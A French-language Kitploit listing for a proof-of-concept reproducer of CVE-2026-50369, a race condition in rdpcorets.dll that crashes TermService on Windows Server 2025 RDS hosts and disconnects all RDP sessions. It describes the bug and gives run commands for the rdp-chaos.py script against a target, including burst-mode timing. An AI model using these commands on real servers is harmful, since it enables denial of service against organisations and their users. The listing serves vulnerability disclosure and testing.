Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-50369 — PoC reproducteur pour CVE-2026-50369, une condition de course TOCTOU dans rdpcorets.dll sur les hôtes de session RDS Windows Server 2025 provoquant un DoS de TermService via la déconnexion de session RDP. | Kitploit
Outils/GitHubGitHub/mofarthim/cve-2026-50369
Analyse des VulnérabilitésExploitationTests d'IntrusionRed Teaming
GitHubmofarthim/cve-2026-50369

CVE-2026-50369

PoC reproducteur pour CVE-2026-50369, une condition de course TOCTOU dans rdpcorets.dll sur les hôtes de session RDS Windows Server 2025 provoquant un DoS de TermService via la déconnexion de session RDP.

Voir le dépôt
2il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-50369

reproducteur pour une condition de course TOCTOU dans rdpcorets.dll!CRdpPipeGfxPlugin::Enable sur les hôtes de session RDS Windows Server 2025.

je l'ai signalé comme un DoS ; le chemin de code semble aussi permettre d'une manière ou d'une autre une EoP. ce reproducteur est un PoC pour le chemin DoS uniquement.

Bug

Enable lit un pointeur d'interface COM à this+0x60 deux fois sans synchronisation. TerminateInstance efface le même champ en dehors de sa propre portée de section critique. Les deux s'exécutent simultanément sur le pool de threads NT via les work items d'arrivée et de retrait de périphérique PnP. La seconde lecture déréférence null → violation d'accès → crash de TermService → déconnexion de toutes les sessions RDP actives.

root@kitploit:~
# install dependencies (Debian/Ubuntu)
sudo apt install -y freerdp3-x11 xvfb python3  # or freerdp2-x11

# create credentials file
echo -e "user1:pass1\nuser2:pass2\nuser3:pass3" > credentials.txt

# standard mode
python3 rdp-chaos.py --server <target> --creds credentials.txt

# burst mode (faster trigger)
python3 rdp-chaos.py --server <target> --creds credentials.txt \
    --burst --burst-count 16 --burst-kill-hold 0.1 --burst-race 0.030
Télécharger l’outil